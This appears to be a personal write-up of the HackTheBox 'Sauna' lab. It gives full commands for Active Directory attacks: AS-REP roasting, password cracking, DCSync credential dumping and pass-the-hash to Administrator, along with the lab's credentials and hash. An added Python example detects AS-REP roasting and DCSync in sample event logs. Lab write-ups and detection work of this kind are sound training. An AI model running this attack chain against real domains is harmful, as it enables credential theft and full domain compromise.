Sauna on HackTheBox

Before all

Victim’s IP : 10.10.10.175
Victim’s Host : *.EGOTISTICAL-BANK.LOCAL
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

rustscan -a 10.10.10.175 --ulimit 5000 -- -sC -sV -Pn

Result

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-22 21:12:36Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49697/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35558/tcp): CLEAN (Timeout)
| Check 2 (port 26043/tcp): CLEAN (Timeout)
| Check 3 (port 57297/udp): CLEAN (Timeout)
| Check 4 (port 28932/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 8h00m06s
| smb2-time:
| date: 2024-12-22T21:13:32
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

This gives us the domain name EGOTISTICAL-BANK.LOCAL. Besides the usual SMB, LDAP and Windows RPC services, the box oddly also exposes a web server.

Username Gathering

Browsing to http://egotistical-bank.local/about.html reveals six employee names. Use username-anarchy (link) to generate candidate usernames for the next step:

Command

username-anarchy -i possible.txt > userlist.txt

Exploitation

AS-REP Roasting

First, enumerate valid usernames with kerbrute:

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 userlist.txt

This yields fsmith as a valid account. Trying the GetNPUsers tool shows that this account does not require Kerberos pre-authentication:

impacket-GetNPUsers -dc-ip 10.10.10.175 -request -usersfile userlist.txt EGOTISTICAL-BANK.LOCAL/

Feed the obtained TGT to john to crack it; fsmith's password comes out as Thestrokes23.
Finally, log in with evil-winrm:

evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175

Privilege Escalation

Abusing DCSync

Upload winpeas to the host (using evil-winrm's upload command).
It turns out a user's account and password were left behind in the WSUS data?!

At the same time, run bloodhound to enumerate the domain:

bloodhound-python -c All -u 'fsmith' -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 --zip

Note that svc_loanmgr (the user found just now) has DCSync rights against the host.

impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL'/'svc_loanmgr':'Moneymakestheworldgoround!'@'EGOTISTICAL-BANK.LOCAL'

This gives the Administrator hash 823452073d75b9d1cf70ebdf86c7f98e.
Use evil-winrm once more, this time with pass-the-hash, to get a shell:

evil-winrm -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -i 10.10.10.175
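As an added example (not part of the original writeup), the Python below sketches how a defender would spot the two techniques used above, AS-REP roasting and DCSync, in Windows Security event logs. The event records are constructed and the field names are simplified versions of the fields found in event IDs 4768 and 4662.

```python
# Added example: defender-side checks for AS-REP roasting and DCSync, run over
# constructed records shaped like Windows Security events 4768 and 4662.

# Control-access-right GUIDs a DCSync replication request asks for.
DS_REPL_GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
DS_REPL_GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"

# Constructed sample events; values are illustrative, not taken from the box.
SAMPLE_EVENTS = [
    # Normal TGT request: pre-auth used (2 = PA-ENC-TIMESTAMP), AES (0x12).
    {"EventID": 4768, "TargetUserName": "hsmith", "IpAddress": "10.10.10.50",
     "PreAuthType": 2, "TicketEncryptionType": "0x12"},
    # AS-REP roast pattern: no pre-auth (0) and RC4 (0x17) for the account.
    {"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "10.10.14.14",
     "PreAuthType": 0, "TicketEncryptionType": "0x17"},
    # Legitimate DC-to-DC replication comes from a machine account (name$).
    {"EventID": 4662, "SubjectUserName": "SAUNA$",
     "Properties": DS_REPL_GET_CHANGES_ALL},
    # DCSync pattern: an ordinary user account requests replication rights.
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr",
     "Properties": DS_REPL_GET_CHANGES + " " + DS_REPL_GET_CHANGES_ALL},
]

def asrep_roast_candidates(events):
    """(user, source ip) for 4768 events with no pre-auth and RC4 encryption,
    the combination that GetNPUsers-style requests produce."""
    return [
        (e["TargetUserName"], e["IpAddress"])
        for e in events
        if e.get("EventID") == 4768
        and e.get("PreAuthType") == 0
        and str(e.get("TicketEncryptionType", "")).lower() == "0x17"
    ]

def dcsync_candidates(events):
    """Non-machine accounts that exercised replication control rights (4662);
    the Properties field lists the GUIDs of the rights that were used."""
    wanted = (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL)
    hits = set()
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        user = e.get("SubjectUserName", "")
        if any(g in props for g in wanted) and not user.endswith("$"):
            hits.add(user)
    return sorted(hits)
```

In a real deployment the same two filters map directly onto a SIEM query over the 4768 and 4662 event streams, with the machine-account exclusion replaced by an explicit list of domain controllers.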

After all

Yes, I'm working through HTB's AD 101 Track XD
Did the first three boxes today to warm up; it should get more interesting from here (?)